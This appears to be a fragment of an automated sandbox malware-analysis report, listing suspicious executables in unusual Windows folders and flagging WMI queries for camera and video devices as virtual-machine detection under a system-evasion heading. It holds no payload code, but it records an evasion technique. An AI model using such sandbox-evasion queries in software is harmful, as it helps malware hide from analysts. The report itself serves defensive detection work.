                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeMemory allocated: DD0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeMemory allocated: 1A970000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeMemory allocated: 1950000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeMemory allocated: 1B5A0000 memory reserve | memory write watchJump to behavior
